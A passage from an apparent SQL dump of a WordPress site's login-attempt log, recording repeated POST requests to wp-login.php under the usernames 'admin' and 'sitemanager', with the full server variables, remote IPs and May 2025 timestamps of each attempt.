Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47142\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747031886.2732151;s:12:\"REQUEST_TIME\";i:1747031886;}}','45.67.14.64',0,'2025-05-12 12:08:08','1970-01-01 00:00:00'),(95629,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58776\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747032221.209471;s:12:\"REQUEST_TIME\";i:1747032221;}}','162.0.209.248',0,'2025-05-12 12:13:42','1970-01-01 00:00:00'),(95630,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60598\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747032555.853976;s:12:\"REQUEST_TIME\";i:1747032555;}}','63.250.38.232',0,'2025-05-12 12:19:17','1970-01-01 00:00:00'),(95631,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48714\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747032902.2024801;s:12:\"REQUEST_TIME\";i:1747032902;}}','162.0.229.109',0,'2025-05-12 12:25:04','1970-01-01 00:00:00'),(95632,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35018\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747033247.740205;s:12:\"REQUEST_TIME\";i:1747033247;}}','185.232.41.148',0,'2025-05-12 12:30:49','1970-01-01 00:00:00'),(95633,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44620\";s:11:\"REMOTE_ADDR\";s:11:\"65.60.5.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747033595.60268;s:12:\"REQUEST_TIME\";i:1747033595;}}','65.60.5.206',0,'2025-05-12 12:36:37','1970-01-01 00:00:00'),(95634,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62128\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747033944.3810251;s:12:\"REQUEST_TIME\";i:1747033944;}}','185.104.44.163',0,'2025-05-12 12:42:26','1970-01-01 00:00:00'),(95635,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43732\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747034292.25934;s:12:\"REQUEST_TIME\";i:1747034292;}}','199.188.200.145',0,'2025-05-12 12:48:14','1970-01-01 00:00:00'),(95636,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58842\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.95.176\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747034644.4146421;s:12:\"REQUEST_TIME\";i:1747034644;}}','157.230.95.176',0,'2025-05-12 12:54:06','1970-01-01 00:00:00'),(95637,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51458\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.132.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747034994.1826169;s:12:\"REQUEST_TIME\";i:1747034994;}}','66.29.132.183',0,'2025-05-12 12:59:56','1970-01-01 00:00:00'),(95638,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58212\";s:11:\"REMOTE_ADDR\";s:14:\"195.161.62.167\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747035339.8923299;s:12:\"REQUEST_TIME\";i:1747035339;}}','195.161.62.167',0,'2025-05-12 13:05:41','1970-01-01 